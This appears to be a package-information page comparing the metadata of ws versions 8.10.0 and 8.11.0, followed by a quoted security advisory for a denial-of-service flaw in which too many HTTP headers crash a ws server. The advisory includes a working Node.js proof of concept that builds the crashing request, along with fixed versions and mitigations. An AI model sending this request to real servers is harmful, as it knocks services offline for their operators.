The ws package, a popular choice for WebSocket communication in Node.js, released version 8.11.0 shortly after version 8.10.0. Both versions keep the same core feature set, aimed at providing a simple, fast, and reliable WebSocket implementation for both clients and servers. Examining the package metadata reveals a few changes between the two releases that may influence a developer's decision to upgrade.
All devDependencies are unchanged, indicating no modifications to the tooling or testing environment, and the peerDependencies, which matter for compatibility, are also identical; the differences lie in the package distribution itself. While fileCount stays constant at 19, the unpackedSize of version 8.11.0 is slightly larger, growing from 134610 to 135341 bytes. This suggests minor code adjustments, potentially bug fixes or performance improvements, that were not significant enough to change the file structure. The release dates are roughly two weeks apart, which further suggests that these changes were hot fixes.
Developers should consider upgrading to version 8.11.0 to benefit from these potential improvements. Reviewing the changelog for these versions in the project's GitHub repository (websockets/ws.git) is highly recommended to gain a clearer understanding of the specific changes and to ensure seamless integration with existing WebSocket implementations.
All vulnerabilities related to version 8.11.0 of the package
ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding the server.maxHeadersCount
threshold could be used to crash a ws server.
    const http = require('http');
    const WebSocket = require('ws');

    const wss = new WebSocket.Server({ port: 0 }, function () {
      const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
      const headers = {};
      let count = 0;

      // Build 2000 two-character filler headers so that the handshake
      // headers added afterwards fall beyond the server.maxHeadersCount limit.
      for (let i = 0; i < chars.length; i++) {
        if (count === 2000) break;

        for (let j = 0; j < chars.length; j++) {
          const key = chars[i] + chars[j];
          headers[key] = 'x';

          if (++count === 2000) break;
        }
      }

      headers.Connection = 'Upgrade';
      headers.Upgrade = 'websocket';
      headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
      headers['Sec-WebSocket-Version'] = '13';

      const request = http.request({
        headers: headers,
        host: '127.0.0.1',
        port: wss.address().port
      });

      request.end();
    });
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e).
In vulnerable versions of ws, the issue can be mitigated in the following ways:
1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
2. Set server.maxHeadersCount to 0 so that no limit is applied.
The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.